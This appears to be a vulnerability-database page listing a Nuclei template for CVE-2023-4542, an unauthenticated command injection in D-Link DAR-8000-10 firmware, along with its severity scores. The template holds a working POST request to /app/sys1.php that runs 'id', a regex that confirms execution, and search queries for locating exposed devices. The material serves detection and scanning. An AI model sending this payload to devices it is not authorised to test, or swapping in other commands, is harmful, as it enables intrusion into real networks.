Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-4542
HistoryMay 23, 2024 - 6:33 a.m.

D-Link DAR-8000-10 - Command Injection

2024-05-2306:33:58
ProjectDiscovery
github.com
9
dlink
firmware
command injection
vulnerability
sys1.php

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.4 High

AI Score

Confidence

High

6.5 Medium

CVSS2

Access Vector

Access Complexity

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

0.924 High

EPSS

Percentile

99.0%

D-Link DAR-8000-10 version has an operating system command injection vulnerability. The vulnerability originates from the parameter id of the file /app/sys1.php which can lead to operating system command injection.
id: CVE-2023-4542

info:
  name: D-Link DAR-8000-10 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    D-Link DAR-8000-10 version has an operating system command injection vulnerability. The vulnerability originates from the parameter id of the file /app/sys1.php which can lead to operating system command injection.
  reference:
    - https://github.com/20142995/sectool
    - https://github.com/tanjiti/sec_profile
    - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md
    - https://vuldb.com/?ctiid.238047
    - https://vuldb.com/?id.238047
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-4542
    cwe-id: CWE-78
    epss-score: 0.90977
    epss-percentile: 0.9884
    cpe: cpe:2.3:o:dlink:dar-8000-10_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: dlink
    product: dar-8000-10_firmware
    fofa-query:
      - body="DAR-8000-10" && title="D-Link"
      - body="dar-8000-10" && title="d-link"
  tags: cve,cve2023,dlink

http:
  - raw:
      - |
        POST /app/sys1.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded

        cmd=id

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009b3fb8f525f0694ccb8676f31859b245d7a2c5d2cdd98bf70624e863c2b02d570221008b136d5eccdd29859129ffed2b11f046e85bed6867a80bec6b5a9927f5dcb1e2:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.4 High

AI Score

Confidence

High

6.5 Medium

CVSS2

Access Vector

Access Complexity

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

0.924 High

EPSS

Percentile

99.0%

Related for NUCLEI:CVE-2023-4542